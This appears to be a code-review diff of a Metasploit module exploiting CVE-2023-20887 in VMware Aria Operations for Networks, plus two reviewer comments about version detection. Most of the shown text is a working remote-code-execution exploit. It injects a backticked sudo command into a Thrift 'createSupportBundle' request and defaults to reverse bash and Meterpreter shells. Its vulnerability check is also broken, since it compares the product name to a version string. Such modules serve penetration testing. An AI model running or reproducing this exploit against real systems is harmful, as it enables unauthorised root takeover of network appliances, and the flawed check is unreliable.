modules/exploits/linux/http/vmware_vrni_rce_cve_2023_20887.rb

```diff
@@ -0,0 +1,134 @@
+        'Targets' => [
+          [
+            'Unix (In-Memory)',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :in_memory,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_bash'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X64],
+              'Type' => :linux_dropper,
+              'CmdStagerFlavor' => [ 'curl', 'printf' ],
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 443,
+          'SSL' => true
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+  end
+
+  def check_vrni
+    return send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, '/api/vip/i18n/api/v2/translation/products/vRNIUI/versions/6.8.0/locales/en-GB/components/UI?pseudo=false')
+    })
+  rescue StandardError => e
+    elog("#{peer} - Communication error occurred: #{e.message}", error: e)
+    fail_with(Failure::Unknown, "Communication error occurred: #{e.message}")
+  end
+
+  def execute_command(cmd, _opts = {})
+    print_status("pop thy shell!!!")
+    pop_thy_shell = "[1,\"createSupportBundle\",1,0,{\"1\":{\"str\":\"1111\"},\"2\":{\"str\":\"`sudo #{cmd}`\"},\"3\":{\"str\":\"value3\"},\"4\":{\"lst\":[\"str\",2,\"AAAA\",\"BBBB\"]}}]"
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path,'/saas./resttosaasservlet'),
+      'ctype' => 'application/x-thrift',
+      'headers' => {
+        'Accept' => 'application/json, text/plain, */*'
+      },
+      'encode_params' => false,
+      'data'     => pop_thy_shell
+     })
+
+  rescue StandardError => e
+    elog("#{peer} - Communication error occurred: #{e.message}", error: e)
+    fail_with(Failure::Unknown, "Communication error occurred: #{e.message}")
+  end
+
+  # Checking if the target is potential vulnerable checking the json response to contain the vRNIUI string
+  # that indicates the target is running VMWare Aria Operations for Networks (vRealize Network Insight)
+  def check
+    print_status("Checking if #{peer} can be exploited.")
+    res = check_vrni
+    return CheckCode::Unknown('No response received from the target!') unless res
+
+    body = res.get_json_document
+    if body.nil? || body['data']['productName'] != 'vRNIUI'
+      return CheckCode::Safe('Target is not running VMWare Aria Operations for Networks (vRealize Network Insight).')
+    end
+
+    return CheckCode::Vulnerable if body['data']['productName'] == "6.8.0"
```

Comment:
According to https://kb.vmware.com/s/article/92684 there are vulnerable version in 6.2 - 6.10. This seems unnecessarily restrictive and may not correctly identify patched versions.

Reply:
Consider testing with `Rex::Version`?